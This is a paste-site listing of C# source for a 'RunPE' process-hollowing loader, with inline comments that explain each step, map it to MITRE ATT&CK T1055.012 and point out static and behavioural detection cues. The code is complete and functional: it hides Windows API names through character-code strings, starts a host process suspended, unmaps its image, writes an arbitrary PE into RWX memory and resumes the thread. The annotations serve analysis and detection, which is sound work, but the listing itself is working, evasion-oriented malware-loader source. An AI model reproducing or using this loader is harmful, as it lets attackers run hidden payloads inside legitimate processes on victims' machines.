
Untitled

a guest
Feb 23rd, 2018
  1. RunPE d’oppresor
  2. RunPE d’oppresssor
  3.  
  4. using System.Runtime.InteropServices;
  5. using System;
  6. using System.Text;
  // IX is a "RunPE" loader, i.e. process hollowing (MITRE ATT&CK T1055.012).
  // Given a PE image as a byte array and a command line for a host ("surrogate") process, R() starts
  // the host suspended, unmaps its original image, copies the supplied image into it, repoints the
  // suspended thread at the new entry point and resumes it.
  //
  // Static-analysis notes:
  //  - Only LoadLibraryA and GetProcAddress are declared as P/Invoke imports. Every other API is
  //    resolved at run time through CreateAPI<T>, and its name is assembled from (char) casts, so the
  //    API names never appear as string literals or as import entries in the assembly.
  //  - Marshal.GetDelegateForFunctionPointer fed by GetProcAddress, together with long chains of
  //    Convert.ToString((char)n) + (char)n, is a useful heuristic when triaging managed samples.
  // Behavioural notes:
  //  - The cross-process sequence CreateProcessA(suspended) -> GetThreadContext -> ReadProcessMemory ->
  //    NtUnmapViewOfSection -> VirtualAllocEx(RWX) -> WriteProcessMemory -> SetThreadContext ->
  //    ResumeThread does not depend on how the names were hidden and is what EDR/ETW telemetry should
  //    alert on.
  //  - All offsets below match the 32-bit (PE32 header / x86 CONTEXT) layouts.
  7. public class IX
  8.   {
  9.     [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  10.     internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
  11.     [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  12.     static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
          // Delegate types for the dynamically resolved APIs. The API each one is bound to is taken from
          // the char-code strings decoded in R():
          //   ESS  -> CreateProcessA        EXT -> GetThreadContext     TEX -> SetThreadContext
          //   ION  -> NtUnmapViewOfSection  ORY -> ReadProcessMemory    EAD -> ResumeThread
          //   CEX  -> VirtualAllocEx        CTEX -> VirtualProtectEx    MOR -> WriteProcessMemory
          //   OP   -> same shape as R(); used by AA() to call R() indirectly.
          // STARTUPINFO, PROCESS_INFORMATION and CONTEXT are passed as raw byte[]/IntPtr[]/uint[] buffers
          // rather than as declared structs, so no recognisable struct definitions appear in the metadata.
  13.     delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo);
  14.     delegate bool EXT(IntPtr hThr, uint[] ctxt);
  15.     delegate bool TEX(IntPtr t, uint[] c); //all kernel32
  16.     delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll
  17.     delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
  18.     delegate uint EAD(IntPtr hThread); //kernel32.dll
  19.     delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
  20.     delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
  21.     delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll
  22.     delegate bool OP(byte[] bytes, string surrogateProcess);
  23.  
          // Resolves export `method` from library `name` and wraps the function pointer in a delegate of
          // type T. Neither the LoadLibraryA nor the GetProcAddress result is checked; a failed lookup
          // yields IntPtr.Zero, which Marshal.GetDelegateForFunctionPointer rejects with an exception.
  24.     public T CreateAPI<T>(string name, string method)
  25.     {
  26.     return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T));
  27.     }
          // Public static entry point: builds an IX instance and calls R() through an OP delegate instead
          // of directly, then returns R()'s result unchanged.
  28.     public static bool AA(byte[] bytes, string surrogateProcess)
  29.     {
  30.     IX p = new IX();
  31.     OP F1 = new OP(p.R);
  32.     bool Res = F1(bytes, surrogateProcess);
  33.     return Res;
  34.     }
          // Performs the hollowing. `bytes` is the PE image to run, `surrogateProcess` the command line
          // of the host process to start.
          // Return value: false only when an exception is caught; true on every other path, including
          // when CreateProcessA or a later step reports failure, so the result does not show whether the
          // injection happened. The API lookups below sit outside the try block, so an exception from
          // CreateAPI propagates to the caller.
  35.     public bool R(byte[] bytes, string surrogateProcess)
  36.     {
          // The char codes decode to "kernel32" and "ntdll".
  37.                 String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50;
  38.                 String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108;
          // Decoded export names, in order: CreateProcessA, NtUnmapViewOfSection, GetThreadContext,
          // SetThreadContext, ReadProcessMemory, ResumeThread, VirtualAllocEx, VirtualProtectEx,
          // WriteProcessMemory. VPE (VirtualProtectEx) is resolved but never called in this listing.
  39.     ESS CP = CreateAPI<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65);
  40.     ION NUVS = CreateAPI<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110);
  41.     EXT GTC = CreateAPI<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  42.     TEX STC = CreateAPI<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  43.     ORY RPM = CreateAPI<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  44.     EAD RT = CreateAPI<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100);
  45.     CEX VAE = CreateAPI<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120);
  46.     CTEX VPE = CreateAPI<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120);
  47.     MOR WPM = CreateAPI<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  48.     try
  49.     {
  50.     IntPtr procAttr = IntPtr.Zero;
          // Four pointer-sized slots standing in for PROCESS_INFORMATION: [0] is used below as the
          // process handle and [1] as the thread handle.
  51.     IntPtr[] processInfo = new IntPtr[4];
          // 0x44 zeroed bytes standing in for a 32-bit STARTUPINFOA.
  52.     byte[] startupInfo = new byte[0x44];
          // PE parsing with fixed PE32 offsets and no bounds or signature validation:
          // num2 = e_lfanew (offset 60 / 0x3C), num = NumberOfSections (NT headers + 6),
          // ptr4 = SizeOfHeaders (NT headers + 0x54).
  53.     int num2 = BitConverter.ToInt32(bytes, 60);
  54.     int num = BitConverter.ToInt16(bytes, num2 + 6);
  55.     IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
          // Creation flag 4 is CREATE_SUSPENDED: the host process exists but its thread has not run yet.
          // Telemetry: a process-creation event for the surrogate whose parent is this managed process.
  56.     if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
  57.     {
          // 0xb3 uints = 716 bytes, the size of the x86 CONTEXT; 0x10002 is CONTEXT_INTEGER on x86.
  58.     uint[] ctxt = new uint[0xb3];
  59.     ctxt[0] = 0x10002;
  60.     if (GTC(processInfo[1], ctxt))
  61.     {
          // ctxt[0x29] is byte offset 164 of the x86 CONTEXT (Ebx), which holds the PEB address for a
          // freshly created suspended thread; +8 is the PEB's image-base field.
  62.     IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
  63.     IntPtr buffer = IntPtr.Zero;
  64.     IntPtr bufferSize = new IntPtr(4);
  65.     IntPtr numRead = IntPtr.Zero;
          // Reads the host's current image base (4 bytes) out of its PEB, then unmaps that image.
          // NtUnmapViewOfSection against a newly created child is the classic hollowing indicator.
  66.     if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
  67.     {
          // addr = ImageBase (NT headers + 0x34), size = SizeOfImage (NT headers + 80) of the supplied PE.
          // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: the whole image is mapped
          // RWX in the remote process, and no later protection change is made in this listing.
          // The return values of VAE and of every WPM call are ignored.
  68.     IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
  69.     IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
  70.     IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
  71.     int lpNumberOfBytesWritten;
          // Copies the PE headers (first SizeOfHeaders bytes of `bytes`) to the new base.
  72.     WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten);
  73.     int num5 = num - 1;
          // One iteration per section header (40 bytes each, first header at NT headers + 0xf8).
          // dst[3] = VirtualAddress, dst[4] = SizeOfRawData, dst[5] = PointerToRawData.
  74.     for (int i = 0; i <= num5; i++)
  75.     {
  76.     int[] dst = new int[10];
  77.     Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
          // (dst[4] - 1) + 1 is just dst[4], and Convert.ToInt32(null, 2) evaluates to 0; both are
          // roundabout spellings of plain values.
  78.     byte[] buffer2 = new byte[(dst[4] - 1) + 1];
  79.     Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length);
          // `size` and `addr` are reused here as "remote destination" and "byte count".
  80.     size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
  81.     addr = new IntPtr(buffer2.Length);
  82.     WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
  83.     }
          // Overwrites the PEB image-base field with the new base address (4 bytes).
  84.     size = new IntPtr(ctxt[0x29] + 8L);
  85.     addr = new IntPtr(4);
  86.     WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
          // ctxt[0x2c] is byte offset 176 of the x86 CONTEXT (Eax), where a suspended process's initial
          // thread keeps its start address; it is set to new base + AddressOfEntryPoint (NT headers + 40).
  87.     ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
  88.     STC(processInfo[1], ctxt);
  89.     }
  90.     }
          // The thread is resumed whenever CreateProcessA succeeded, whether or not the steps above did.
          // No CloseHandle or TerminateProcess call appears anywhere in the class.
  91.     RT(processInfo[1]);
  92.     }
  93.     }
          // Untyped catch: every exception (bad offsets, short buffers, marshalling faults) is swallowed.
          // If it fires after CreateProcessA succeeded, the child is left suspended, which can remain as
          // a forensic artefact on the host.
  94.     catch
  95.     {
  96.     return false;
  97.     }
  98.     return true;
  99.     }
  100.   }